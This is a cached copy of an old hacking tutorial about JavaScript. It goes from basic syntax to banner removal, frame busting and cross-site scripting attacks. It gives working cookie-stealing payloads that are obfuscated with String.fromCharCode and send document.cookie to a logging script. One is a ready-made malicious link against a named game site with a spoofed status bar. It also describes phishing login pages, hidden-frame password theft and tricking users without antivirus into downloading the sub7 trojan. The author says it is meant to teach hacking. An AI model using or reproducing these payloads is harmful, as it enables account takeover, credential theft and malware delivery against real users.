Dit is G o o g l e 's cache van http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm. G o o g l e's cache is
de momentopname die we van deze pagina hebben gemaakt toen we het
web doorzochten. De pagina kan ondertussen gewijzigd zijn. Klik
hier voor de huidige pagina zonder selectie Gebruik de
volgende URL om deze pagina aan je Favorieten toe te voegen of
ernaar te linken:
http://www.google.com/search?q=cache:4unLpevd1J4C:www.eccentrix.com/education/b0iler/tutorials/javascript.htm+&hl=nl&ie=UTF-8
Google heeft geen banden met de auteurs van
deze pagina en is niet verantwoordelijk voor de inhoud
ervan
-things to
come: example of stealing info from users (anti-virus programs and trojans),
story of ciru cookie stealing from acanium, and the about:// exploit.
Since so many people were asking when this tutorial would come out I decided to
finally put it up. I'd appriecated some feedback. Flames without a
reason are not welcome.
Intro
Javascript is used as a client side scripting language,
meaning that your browser is what interprets it. It is used on webpages
and is secure (for the most part) since it cannot touch any files on your hard
drive (besides cookies). It also cannot read/write any files on the
server. Knowing javascript can help you in both creating dynamic webpages,
meaning webpages that change, and hacking. First I will start with the
basic javascript syntax, then I will list a few sites where you can learn more,
and then I will list a few ways you can use javascript to hack.
There
are a few benifits of knowing javascript. For starters, it is really the
only languages that you can use on a website making it a very popular language
on the net. It is very easy to learn and shares common syntax with many
other languages. And it is completely open source, if you find something you
like done in javascript you can simply view the source of the page and figure
out how it's done. The reason I first got into javascript was because back
before I got into hacking I wanted to make my own webpage. I learned HTML
very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I
then ventured into the land of javascript making simple scripts and usful
features to my site.
It was only after I was pretty good with javascript
and got into hacking that I slowly saw it's potential to be used
milisously. Many javascript techniques are pretty simple and involve
tricking the user into doing something. Almost pure social engineering
with a bit of help from javascript. After using simple javascript tricks
to fake login pages for webbased email I thought about other ways javascript
could be used to aid my hacking, I studied it on and off for around a
year. Some of these techniques are used by millions of people, some I came
up with an are purely theorectical. I hope you will realize how much
javascript can aid a hacker.
The basics of javascript are fairly easy if you
have programmed anything before, although javascript is not java, if you know
java you should have no problems learning it. Same for any other
programming language, as most share the same basics as javascript uses.
This tutorial might not be for the complete newbie. I would like to be
able to do a tutorial like that, but I don't have the time or patience to write
one. To begin if you don't know html you must learn it first!
Javascript starts with the tag <script language="javascript"> and
ends with </script> Anything between these two tags is interpreted
as javascript by the browser. Remember this! Cause a few hacks use
the fact that if you use <script type="javascript"> and don't finish it
all the html on the page underneath that is ignored. You can also use
<script type="text/javascript"> and <</script>.. either way is
fine. I would also like to mention that many scripts have <!-- right
after the <script type="text/javascript"> tag and //--> right before
the </script> tag, this is because they would like to make it compatible
with other browsers that do not support javascript. Again, either way is
fine, but I will be using the <!-- and //--> because that is how I learned
to script and I got used to putting it in.
Javascript uses the same
basic elements as other programming languages.. Such as variables, flow control,
and functions. The only difference is that javascript is a lot more
simplified, so anyone with some programming experience can learn javascript very
quickly. The hardest part of scripting javascript is to get it to work in
all browsers. I will now go over the basics of variables:
to
define a variable as a number you do: var name = 1; to define a variable as a
string you do: var name = 'value';
A variable is basically the same in
all programming languages. I might also point out that javascript does not
support pointers. No structs to make your own variables either. Only
variable types are defined by 'var'. This can be a hard thing to
understand at first, but javascript is much like C++ in how it handles variables
and strings. A string is a group of characters, like: 'word', which is a
string. When you see something like document.write(something); it
will try to print whatever is in the variable something. If you do
document.write('something'); or document.write("something"); it will
print the string 'something'. Now that you got the variables down lets see
how to use arithmetic operators. This will make 2 variables and add them
together to make a new word:
<script
type="text/javascript"> <!-- var name = 'b0iler'; var adjective =
'owns'; document.write(name+adjective); //--> </script>
first we define the variable 'name' as b0iler, then I define 'adjective'
as owns. Then the document.write() function writes it to the page as
'name'+'adjective' or b0ilerowns. If we wanted a space we could have did
document.write(name+' '+adjective);
Escaping characters - This is an
important concept in programming, and extremely important in secure programming
for other languages.. javascript doesn't really need to worry about secure
programming practice since there is nothing that can be gained on the server
from exploitting javascript. So what is "escaping"? It is putting a
\ in front of certain characters, such as ' and ". If we wanted to print
out:
b0iler's website
We couldn't do:
document.write('b0iler's website');
because the browser would
read b0iler and see the ' then stop the string. We need to add a \ before
the ' so that the browser knows to print ' and not interpret it as the ending '
of the string. So here is how we could print
it: document.write('b0iler\'s website');
There are two types of
comments in javascript. // which only lasts till the end of the line, and
/* which goes as many as far as possible until it reaches */ I'll demonstrate:
<script type="text/javascript"> <!-- document.write('this
will show up'); // this will not, even document.write('blah'); won't /*
document.write('this also will not show up'); this won't ether.
document.write('or this'); it is all in the comments.. which aren't rendered
by the browser */ //--> </script>
The only thing that
script will do is print "this will show up". Everything else is in
comments which are not rendered as javascript by the browser.
Flow
Control is basically changing what the program does depending on whether
something is true or not. Again, if you have had any previous programming
experience this is old stuff. You can do this a few different ways
different ways. The simplest is the if-then-else statements. Here is
an example:
<script type="text/javascript"> <!-- var name
= 'b0iler';
if (name == 'b0iler'){ document.write('b0iler is a really
cool guy!'); } else { document.write('b0iler can not define variables worth a
hoot!'); } //--> </script>
Lets break this down step by
step. First I create the variable 'name' and define it as b0iler.
Then I check if 'name' is equal to "b0iler" if it is then I write 'b0iler is a
really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can
not define variables worth a hoot!'. You will notice that I put { and }
around the actions after the if and else statements. You do this so that
javascript knows how much to do when it is true. When I say true think of
it this way:
if (name == 'b0iler') as if the variable name is
equal to 'b0iler'
if the statement name == 'b0iler' is false (name does
not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.
We now run into relational and equality operators. The relational
operators are as follows:
> - Greater than, if the left is greater
than the right the statement is true. < - Less than, if the left is lesser
than the right the statement is true. >= - Greater than or equal to.
If the left is greater than or equal to the right it is true. <= - Less
than or equal to. If the left is lesser than or equal to the right it is
true.
So lets run through a quick example of this, in this example the
variable 'lower' is set to 1 and the variable 'higher' is set to 10. If
lower is less than higher then we add 10 to lower, otherwise we messed up
assigning the variables (or with the if statement).
<script
type="text/javascript"> <!-- var lower = 1; var higher = 10;
if (lower < higher) { lower = lower + 10; } //we could have
used lower += lower; document.write('lower should be greater than higher.. or
else I messed up."); document.write('lower:'+lower+' and
higher:'+higher); //--> </script>
and now the equality
operators, you have already seen one of them in an example: if (name ==
'b0iler') the equality operators are == for "equal to" and != for "not equal
to". Make sure you always put two equal signs (==) because if you put only
one (=) then it will not check for equality. This is a common mistake that
is often overlooked.
Now we will get into loops, loops continue the
statements in between the curly brackets {} until they are no longer true. There
are 2 main types of loops I will cover: while and for loops. Here is an
example of a while loop:
<script
type="text/javascript"> <!-- var name = 'b0iler'; var namenumber
= 1;
while (namenumber < 5) { name = name + name;
// could have used: name += name;
document.write(name); namenumber = namenumber +
1; } //--> </script>
First 'name' is set to b0iler,
then 'namenumber' is set to 1. Here is where we hit the loop, it is a
while loop. What happens is while namenumber is less than 5 it does the
following 3 commands inside the brackets {}: name = name + name;
document.write(name); namenumber = namenumber + 1; The first
statement doubles the length of 'name' by adding itself on to itself. The
second statement prints 'name'. And the third statement increases
'namenumber' by 1. So since 'namenumber' goes up 1 each time through
the loop, the loop will go through 4 times. After the 4th time
'namenumber' will be 5, so the statement namenumber < 5 will no longer be
true.
Let me quickly go over some short cuts to standard math operators,
these shortcuts are:
variable++; // adds 1 to
variable. variable--; // subtracts 1 from variable. variable+=
something; // adds something to variable. Make sure to use 's if it
is a string like: variable+= 'string'; variable-= 3; // subtracts 3
from variable variable*= 2; // multiples variable by 2.
Next
loop is the for loop. This loop is unique in that it (defines a variable;
then checks if a condition is true; and finally changes a variable after each
time through the loop). For the example lets say you want to do the same
thing as above. This is how you would do it with a for loop:
<script type="text/javascript"> <!-- var name =
'b0iler'; for (var namenumber = 1; namenumber < 5; namenumber++)
{ name += name; // this is the same as before: name =
name + name;
document.write(name); } //--> </script>
First the
variable name is defined, then it starts the for loop. It assigns 1 to
namenumber, then checks if namenumber is less than 5 every time through the
loop, and it increases namenumber by 1 every time through the loop
(variablename++ means increase the variable by 1). The next 2 lines are
the same as with the while loop. But since the for loop handles the
declaration of namenumber and the increase every time through the loop it makes
it simpler for the scripter and easier to keep track of for people trying to
read the code. You can use a while loop if you want, it is all up to the
scripter's preference.
Lets go over that for loop one more time, just
for clarity. for (done only the first time; loop continues while this is
true; done after every time through the loop)
That's it for learning
javascript, this was really basic and pretty much covered things that are
constant in most languages. For javascript specific guides check out the
next section of the tutorial. This section was only to give the user enough info
to understand the rest of the tutorial. I wish I could go over more, but
there are way better tutorials for advanced javascript then one I could ever
write.
I will just provide
a list of tutorials and sites with more advanced javascript. If you wish
to learn javascript and be able to write your own you will have to look at other
people's scripts for examples and read a few more tutorials. I just went
over the very basics so you wouldn't be lost.
http://www.pageresource.com/jscript/index6.htm
- The advanced string handling and the forms tutorials are good, I would suggest
reading them if you wish to get more into javascripting.
Coolnerd's Javascript
Resource - A nice list of al the javascript operators, statements, objects..
although it might be alittle old I still use it all the time.
If you
want to create your own javascripts for yoursite be warned. Javascripts
are very limited in power, but can be the solution to many simple
problems. You will have to spend a few weeks learning more advanced
javascript in order to make anything really useful. Creating that awsome
DHTML (Dynamic HTML) feels really good ;) Dynamic HTML is pretty much
javascript that interacts with the user, css, and layers - <div>,
<span>, and <layer>.
I call it banner busting,
it is when you use javascript (or other tags) that aren't rendered by the
browser the same as normal html tags to get around a popup or banner that free
sites automatically put on your page. The basic idea of this is to have a
tag that isn't rendered as html right before the html the site adds on their
banner so that user's browsers do not see the banner. There is only really
one key thing you need to find out in order to kill that banner. This is what
tag the site uses as a "key". What I mean by this is what tag does the
banner they add come before or after? Try putting up a page with just:
now upload that page and view it in a
browser. View the source of the page and find where the site added it's
banner html. If it came after the <html> and before the <body>
then you need to see if it came before or after the <!-- blah --> which is
in between those. If it is before, then it is the <html> tag that is
the key tag which the site adds it's banner after. If it is under the
<!-- blah --> than you know it puts it after the <body> tag.
So now that we know where the site adds it's banner html what do we do
to stop it? We try to make a "fake" tag and hopefully the site adds it's
banner html to the fake one instead. Then we use javascript to print the
real one. We can do a few things, here is the list:
the basic <noscript> - this used to work, as most banners or popups
start with some javascript, but now free sites have gotten smart and
automaticly add a </noscript> to stop
it.
<noscript> <keytag> -this keytag is
the decoy. Before/after this tag is where the banner would
be. </noscript> <keytag> -this keytag is the
real one.
<script> , <style> , <xml> - these are a few examples of
tags that will make the add on html and javascript of the site's banner not
render by the browser. since it is not in the syntax of css, xml or
javascript (it is html) user's browsers will just ignore
it.
<style> <keytag> -this keytag is the
decoy. Before/after this tag is where the banner would
be. </style> <keytag> -this keytag is the real
one.
printing tags with javascript - this one was thought up by acecww and
works really well, if you are having problems when you put the real keytag
then try using javascript so the site doesn't even see it as the keytag.
you get javascript to print the tags one letter at a time.
<script
type="javascript"> <!-- document.write('<'+'k'+'e'+'y'+'t'+'a'+'g'+'>'); //--> </script> <style> <keytag>
-this keytag is the decoy. Before/after this tag is where the banner
would be. </style>
If all worked out you should
have a page with no annoying popups or flashing banners. If not I guess
you will have to play around a little and figure it out for yourself.
Since every free host uses different keytags and methods of adding it's banner I
can't go over them all one by one.
I decided to go over a real example
of a free site that add popup ads or banners to every page you have. I'll
be using angelfire since I hate them and because that's the one I picked out of
my lucky hat. Just remember that sites can change the way they add banners
anytime they feel like, so this method might not work the same way as I am
showing. Doing this also breaks the TOS (Terms Of Service) with your host,
so you might get your site taken down without any warning. Always have
complete backups of your site on your harddrive, espechially if you have a
hacking site or are breaking the TOS.
angelfire
------------------------ begin ------------------------
<html> <head> <title>testing</title> </head> <body> <!--
Beginning of Angelfire Ad Code Insertion -->
</noscript> <script language="JavaScript"> <!--
(this is where the angelfire ad script would be.)
//--> </script> <!-- End of Angelfire Ad Code
Insertion -->
<p> rest of test page</p>
</body> </html>
------------------------ end ------------------------
as
you can see angelfire puts their ad right after the <body> tag. All
they are using to protect us from getting rid of the ad is a </noscript>
so.. we can put something like this to defeat the ad:
<style> <body>
</style> <body>
So angelfire's server will add the javascript for thier advertisment
after the first <body> they see. That will put the ad after
<style><body> and before </style>. This means that
user's browsers will think that <body> and the angelfires ad is css
(cascading style sheet).. which is the <style> tag. Since javascript
and html cannot be in css the browser ignores it. We then put the real
<body> after this and continue with our site.
About a month after
I wrote this I came up with an idea of how to complete remove the advertisments
sites put on your pages. I am not 100% sure it will work, but the basic
idea is to have a cgi script open all the .html pages in your directory, remove
the ad, and write the html back to the .html files. Few things might
affect how well this works. First if the script that adds the ad to the
.html files is a cron job, but I doubt this, since it would put heavy strain on
the system to search and write to all those files. Second, the script
might be ran whenever a .html file is editted, I am hoping that it is only ran
when a file is created or a file is uploaded. I'll test this out someday,
if you want this script come bother me on irc about it and I might finish it =)
Killing Frames
Now I'll go over how to kill
frames. The reason you would need this script is to hack namezero, nbci,
and other companies which put your page in a frame. Killing a frame means
to get rid of it so that your site is the one filling the whole window.
There is one solid way which has always worked for doing this. Not
only will it bust out of companies frames.. But if some lamer is leeching your
site by using frames this will stop them. The script is as follows:
<script type="javascript"> if (self != top)
top.location.replace(self.location); //--> </script>
What
this script does is checks if the current page is not the top (first) frame, if
it isn't then it puts itself as the top frame, deleting the other frame from the
browser window. Pretty handy trick =)
Lets say we are
entering info to a guestbook. This would be put on the main page of the
guestbook. And whenever anyone visited that page we want them to be sent to
http://www.lameindustries.org. We would enter this in the guestbook:
Sometimes
when you want to use javascript there is some form of filtering going on that
stops the <script> tag from being rendered as usual. For those of you who
know perl I will demonstrate.
[Line from a perl script that filters
input for the <script> tag]
$input =
s/<script/<script/ig;
$input is what you submitted to the
perl script, what it is doing is looking for <script in your input and
replacing it with <script. So how do you get around this? We
can use the hex value of any or all characters in <script
type="javascript"> the only characters you cannot do this for are the
< and the > because they would not be rendered by the browser if you did.
So now we enter something like this into the guestbook:
How did I
know what the hex value of 's' was? I just checked an ascii chart and
added & before it and ; after it. You can use this in the url of your
browser as well, just put % before the number. A chart ascii chart is
available at www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml
or man ascii if you run *nix.
There are a few other situations where
javascript can be useful. If you can get around the filter on a users
email you can use your spoofing email skills to send an email from someone they
trust. If they open it you can have the email redirect them to a page
which says something like "session timed out, please login in again" and have
that form submitted to a cgi script that logs it. This works for a small
percentage of people, but it is worth a shot sometimes.
Getting by
javascript filters can lead to you getting cookies for such things as forums,
shopping carts, sites, and redirecting users to the site of your choice.
Anywhere there is input that is displayed on a page which other people may visit
(or you can make them visit) there is an opportunity to use javascript to steal
information. Infact just today as I am writing this it was found that
lycos and other search engines are vulnerable to javascript in website's
descriptions and names, read the slashdot
story for more info. This could lead to 100% clicks for any search
your site turns up on ;).
Here is a cert advisory concerning insertion
of scripts (javascript, vbscript, etc..) inputted into scripts:
update: there has been a new advisory for hotmail and other sites which
filter javascript. The problem lays in css and the use of the <link>
tag. When the following code is used the linked javascript will be
executed, making it possible to steal cookies, info, or redirect users to a fake
login page.
put that in the body, preferably as the first
thing. Of course hotmail patched it days after it was reported, but it
stand to show that hotmail is not 100% secure and there will still be ways in
the future to get scriptting executed. Also other web based email,
guestbook, message boards, etc.. might be vulnerable to this. You can use
old hotmail exploits on many other scripts that allow input and print them to a
.html file. I found this vulnerability in a script that cyberarmy.com ran
for their web based mail, I just did a <script
type="javascript"> and redirected the user to a fake login
page. When they logged in with their user and password it sent them to a
script that wrote their info to a database and then logged them into the web
based email script again. The script was made by solutionscripts, and
cyberarmy is no longer vulnerable.
Also note that normal text field
input is not the only way to insert data into a script. Hidden fields and
environment variables are also sometimes vulnerable. Some scripts will
filter all the text fields, but will not filter the hidden fields, this allows
you to insert javascript or other nasty things. I won't go to much into
that since it would require a whole nother tutorial and because writting
javascript isn't the first thing you would try to exploit with that.
Environment variables that you can exploit are usually referrer or user-agent,
since those tend to be the only ones ever written to a file, they are also the
least filtered input in my experience. It's much easier to find ways to
insert javascript if you can get ahold of the source of the script. There
are two easy ways to do this, the first is to see if the script is open source,
then go download and review the code for holes. The other is to look for
other scripts/exploits that allow you to view the source of other scripts.
So do some research for other exploits in other scripts (or the webserver
itself).
note: to do this you'll need a little bit of
advanced javascript knowledge, and some perl/php/asp (or other server side
language).
Stealing cookies can be a dangerous problem for many
sites. It all depends on how the site sets up it's security. If a
site just uses cookies to identify users than it could be vulnerable. If
you need to login then it is almost useless to try and steal cookies.
Unless of course the username and passwords are stored in the cookie and is not
encrypted. Sometimes you are allowed access without logging in. We will
pick on http://neworder.box.sk since they stold some LI tutorials, even though
they are not vuln to this because you must login to their site and the user
password is not in the cookie. (Lets see if they steal a tutorial which
explains how to exploit a hole in one of their scripts ;) How we
will be exploiting this bug is simple. Luckily cube left us a vulnerable
script on the site to play with. The script is
http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.
What is vuln about this script? It doesn't escape the inputted
characters that are printed to the page. I told you escaping characters is
important. The script instead relies on a simple <pre> tag to stop
javascript. So the first thing we must do is test and see what character's
(if any) are left unescaped for us to use. After a check for these
characters: ' " ; | < > / and % we find that he does escape ' and ".
If he didn't we could exploit the php script itself and have total control over
the site. I will get to a little trick in a second where we can get
javascript to print out ' and ". But for now we must stop that <pre>
tag. So we end it with a </pre> then insert any javascript we would
like.
In the first paragraph I said that javascript is mostly secure,
because it cannot read or write any files off a users hard drive besides
cookies. Here we will use javascript to read the user’s cookie for
neworder and then use javascript to send them to a cgi script where we log
their cookie to a txt file. After this we check the log from the cgi
script and save the cookie where our browser keeps them. Or we can get the
username and password from the cookie and login to the site (neworder doesn't
keep the user's password in the cookie).
So now to print the javascript
that will steal the cookie. What we are doing is using the script that
prints out unescaped characters to the page as if it was javascript that was
really on that website. So we can view and edit user cookies. There
are two main problems we must overcome. First we need to print a string
without using ' and " since the .php script on neworder does escape those
characters. How we do this is by using javascript which doesn't need ' or
" and prints out any character. This is one way to do it:
<script type=text/javascript>
var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B= document.cookie;
document.location.replace(u);
//-->
</script>
We need to use %2B instead of + because + becomes a space when you go
to the script. There is probably an easier way of doing this besides using
fromCharCode, but I couldn't think of any =) The 0x0068 is ascii for
h. 74 is t.. (You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html):
68=h
74=t
74=t
70=p
3A=:
2F=/
2F=/
73=s
69=i
74=t
65=e
2E=.
63=c
6F=o
6D=m
2F=/
61=a
2E=.
63=c
67=g
69=i
3F=?
In other words it makes the var u equal to the string http://site.com/a.cgi?
All right, so we got a string in a variable without using ' or
". var u = 'http://site.com/a.cgi?'; would be the same thing if the script
didn't filter for ' and ". So now that we got the string going what should
we do? Well what we are trying to do is get the cookie in a string and
then send them to a cgi script that logs what's in the cookie.
document.cookie is the cookie for that site. If there is more than one
cookie then you have to use a little trickery. try
this page for learning how to handle multiple cookies. Now we need to add
the cookie to the end of the url. So:
u %2B= document.cookie;
Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie (but
user_s_cookie is actually the value in their cookie). So now we make
javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be a cgi script
that just logs whatever is inputted to it into a database. Another way to
log their cookie would be to put something like:
But since this script filters ' and " it would be a really long url to put
fromCharCode's for every character.. Also, you would have to have access to the
logs of the site in order to check what files were requested from 'somedir'
directory.
All cookie stealing techniques require some kind of script on
your website to log the cookie when it is sent as a url.
Once you have a
user's cookie there are 2 things it can be used for. Sometimes sites put
their username and password right in the cookie. In this case you can just
log into the site with that. Some other sites just simply use a cookie to
authenticate users. No login required.
now if you have a cookie of a geocities member you can go to
www.geocities.com and you will automatically be logged in. From there you
have full control over their account.
But geocities did do something to
stop this. They have their website go to http://geocities.yahoo.com .. So the
cookie for users is actually a yahoo cookie ;( If you try the same trick
where you go to a 404 file on yahoo it won't print the < and >
characters. But if you were to find a script on yahoo that printed out
< and > you could easily do this =) A few years ago, before yahoo
teamed up with geocities this attack could have been used to takeover accounts.
So how would you get users to visit these urls? Try things like
...
Yeah all you redlite players, check out this hidden pick, funny as
hell: Check
this page out! Or better yet.. Load it in a frame that is 0%
large. The user won't even know what hit them =)
oh, the source
for that redlite link is: <a
href="http://www.redlite.org/signup/signup2.php?username=<script
type=text/javascript>var u = String.fromCharCode(0x0068);u %2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);u %2B=
String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);u %2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x0062);u %2B= String.fromCharCode(0x0030);u %2B=
String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002E);u %2B=
String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x0072);u %2B=
String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002F);u %2B=
String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x002E);u %2B=
String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x0068);u %2B=
String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true" onMouseOut="window.status='';return true"> Check this page out!
</a>
notice
the: onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true" and onMouseOut="window.status='';return true" at the end.. This
is to trick the user into thinking that the link leads somewhere else.
Again, using javascript to manipulate what the user sees to help trick them.
So how can a coder stop this vulnerablitiy? I would say never
print user inputted data back to the user. also filter out <, >, and
pack all url encoding before filtering input. I found a way to steal
cookies in the old ikonboard using the profile.cgi, although it wasn't too big a
deal since there was more serious holes in ikonboard it still way bad
programming practice to print unfiltered input. Now ikonboard does not use
profile.cgi, it doesn't print inputted data to the screen, and it filters data.
A few other problems with javascript and cookie stealing: http://www.peacefire.org/security/hmattach/
- A hotmail exploit. Since hotmail didn't filter javascript and allowed
.html attachments to be viewed and not downloaded.
Ok, this method will not be used very often,
and isn't too valuable a skill to the average hacker.. But it can come in very
handy. This was originally a news post on my site, but it fits into this
tutorial nicely. I know that this part might be very poorly explained and
many people won't understand how it works. But I have tried to atleast
make it so people with advanced javascript knowledge can make some sense of how
the attack works. Also note that this attack is purely theory, I have not
used this against an actual site yet. It might even be used against sites
which require you to fill in a form to login, this means hotmail, yahoo, and
100,000,000 other sites, but it would require extra coding, some of which I am
not sure if it is possible.
Ok, in this article I will explain how to
steal info from users by using javascript.
What this exploit requires
is: A script that prints info you want into an input field. The script doesn't check the
referrer.
The most used reason for this would be to get usernames and
passwords from sites. An example of this would be cyberarmy.com which was
vulnerable to this for along time. You will notice that if we did have the
user's cookie that we could have simply viewed this page and gotten their
password, but cyberarmy was pretty secure in not printing unescaped data to the
user's browser.
Now we will be doing this:
1 main page with
2 frames. frame #1 - will look like a normal page and will steal the info
from frame #2. frame #2 - will load the page in a hidden frame.
this
is what the main page will look like:
-------- begin --------
<html>
<script
language="JavaScript"><!-- document.write('<frameset cols="10%,*"
frameborder="yes" framespacing="0" border="3">'); //for the example we are
using cols="10%.*" but in a real life attack you would use cols="0px,*" or
something, as to hide the frame that is stealing the form value.
document.write('<frame src="fuckca.html" scrolling="no" noresize
name=blah>'); document.write('<frame src="userconfig.html"
scrolling="auto" noresize
name=vulnscript>'); document.write('<\/frameset>');
//You
might be wondering why I used javascript to print the <frameset>.
This was done so we can print more javascript on the page. (the javascript
that steals the form value.
printhtml(0);
function
printhtml(counter){
if (counter == 0) { var
the_timeout = setTimeout("printhtml(1);",11000); counter++;
}
var thehtml =
window.vulnscript.document.all.tags('HTML')[0].innerHTML;
all this does is print out the value of
the first (unnamed) form from the frame named vulnscript (the one that has the
page where we want to steal data from).
This is what their userconfig.pl
displayed that we were grabbing:
The problem is
that it would display the password in plain text (value="testpass" - testpass is
the password) why it did this I don't know, stupid programming I guess.
But if you got a hold of someone’s cookie you could view that script and it
would give you the pass.. So what this little trick with frames and javascript
does is make users visit the page without knowing and then lets our javascript
grab their password. Instead of printing the password to frame #1
(name=blah) we could have sent an invisible frame to a script which logs
input. Example:
I would then
tell a few people who I want passwords from about this page, say "hey, want to
see a picture of my girlfriend?" (All hackX0r guys like pics of girls)
then I would just put up some stupid pic.. Maybe Britney Spears or something.
The log.cgi would log both name1 (their password) and $ENV{'REMOTE_ADDR'} (their
ip address). This would let me match up usernames to passwords fairly
easy. You could also get their username from grabbing it off the page, or
from the contents of the cookie.
This attack is fairly complicated, so I
didn't explain why I did a few things. I figure anyone who could actually pull
this off would understand why. Also not many sites are vuln to this, and
even the ones that are usually the attacker does not have the ability to hop on
the irc channel and trick people into viewing it.
Ok, this is probably the least
likely technique in this tutorial to be used. All the rest can be used
fairly often. This one is used to gain enough info on someone in order to
form a trojan attack on them. What this javascript will allow us to do is
to probe their system and see if they have any security against our
attack. It will let us see what anti-virus program they use, what firewall
they use, and if they have any programs that allow us to infect them with
macros.
Lets say we
check for anti-virus programs, if they don't have any you can display a link to
download sub7 and say it is a video game... if they do have an anti-virus
program you can display the link to the real game. This way you don't have
to worry about the user finding out that you tried to send them a trojan.
Only users who don't have an anti-virus program will have downloaded the trojan.
One possible future for trojan's is modules that you can insert to
attack specific programs. For instance if you know the user is running a
certain type of anti-virus program and they are running a certain type of
firewall you can plug those modules into the trojan. When the user
downloads and runs this trojan the modules will trojan those anti-virus and
firewall making them seem as if they are running fine, when they aren't.
Ether they won't detect your trojan or they will replace them with a emtpy
program that just puts the icons in the taskbar and task list. I will try
to get a working deminstration of how javascript can be used to download the
correct trojan for a user's system or detect if the trojan will be detected by
an anti-virus program so it will make them download a regular file.
If
you have a firewall or anti-virus program please send me the full address
(absolute address) to all the images it has. email the list to
b0iler@hotmail.com What the javascript will do is try and load that
image, if it does then ie will return a true value, if it doesn't ie will return
false and we will know the user does not have that software installed.
When I get enough info on the main anti-virus and main firewalls I will put
together the code and explain it better.
This section isn't really done,
but I am getting sick of writing so I guess I'll have to finish it later.
All I am going to do is add a demo of how to check for anti-virus programs.
I have decided to add a section
here of a few interesting javascript hacks I have heard about and seen.
Since normal web site defacments and such are full of script kiddies who just
./own site.com with no creativity or thought I like to hear a nice story of
hackers coming up with cool ways to manipulate systems and people.
First
story is about a webgame called redlite (taken from a tutorial I wrote a
few weeks ago)
What happend was that a friend of mine found his first
exploit and with the help of someone else coding it - got it to work really
good. Before I continue with the story you'll need to know alittle bit
about the situation.
In #b0g on us.undernet.org, a place where I hang out
sometimes there is alot of people into this online game called redlite. The object of the game is to
fight people in an online version of a drug war. You have crack, hoes,
guns, money, and the like. Now a few days prior to this I was about to
sign up for it just to see what all the fuss was about, as I was signing up I
saw that the registration script prints what is inputted to it. The script
also didn't filter anything but ' and " from the input, so it could be used to
steal cookies from users. I coded up the exploit and tested it...
everything worked fine. But I never found out if you can do anything with
just a user's cookie. And I didn't really care about the game, so the
exploit never really got used. When I went back into #b0g xhaze and tak,
two redlite players and b0g gimps had found another script that prints something
to a page.
The page that it prints to is their player profile page.
Which other players have to view before they can attack them. This script
doesn't filter for < or > so they decided to try something =) They
inputted <script type=text/javascript>
window.open('http://www.cisconinja.net/a.php'); </script> - don't visit
that url... so whenever anyone wantted to attack them they got sent to
http://www.cisconinja.net/a.php here is the source to that
page:
This
will open a bunch of windows and sells all the user's stuff.. so they are
defensless against your attack. The crash.php will crash them, so you have
time to attack them and get all the money that they just got from selling all
their stuff. HAHA, works out good doesn't it? Normally you couldn't just
send a user to a url and expect them to sell things, since you need to be logged
into the game to do that. But the only way for enemies to view your
profile is if they are logged in.
This story should have helpped you see
how just being in the right frame of mind and knowing what you can do with the
programing language can lead to some fun hacking. The b0g kids found an
exploit and got it to work to cheat in a game. Now if that happend on a
bank's server there could have been some trouble.
I'll get some more
here in a bit, there was one nice cookie stealing story I heard about a few
years ago that I would really like to find out exactly what happend. If I
do I'll add that here =)
Well, this tutorial was partly written to teach
people how to hack, and partly written to show all those people who say
javascript can't be used to hack that it can. Although you won't really
gain access to a box with javascript you can trick users or steal passwords
which might lead to your comprising the system. I haven't really seen any
other tutorial written on using javascript to hack, so I decided to give it a
go.
I would really like to thank a few people who helped me with
javascript and gave me some ideas along the way. Intruder, acecww, l8nite,
shoelessguy, #javacript on dalnet, #html on dalnet, a few bugtraq postings, and
http://www.guninski.com/ - a really cool
site with tons of example of how javascript can be used to hack. This guy
is pretty much the inventor of javascript hacking. I do not claim that I
found all of these exploits, most of them I got from bugtraq and from
friends. There are of course many other ways to use javascript to aid a
hacker, many are too limited or too strange to explain in this tutorial.
One last thing I would suggest is that you pick up a program called Proxomitron, which lets
you edit webpages, http headers, and a whole bunch of other goodies. This
means you can add javascript into webpages and see how it will react. I
used this program in another tut I wrote, Hacking
Angelfire. I hope you found this paper unique and interesting.
If you have any other javascript tricks feel free to email me
(b0iler@hotmail.com) with them. Also any comments or error corrections are
welcome. And remember to check out all the other killer tutorials over at
www.ninjawriters.org =)
[-----] Info on
Ninjawriters Ninjawriters -
url www.ninajwriters.org - check there for the latest version of this
tutorial. We've got some really great tutorials on some great subjects.
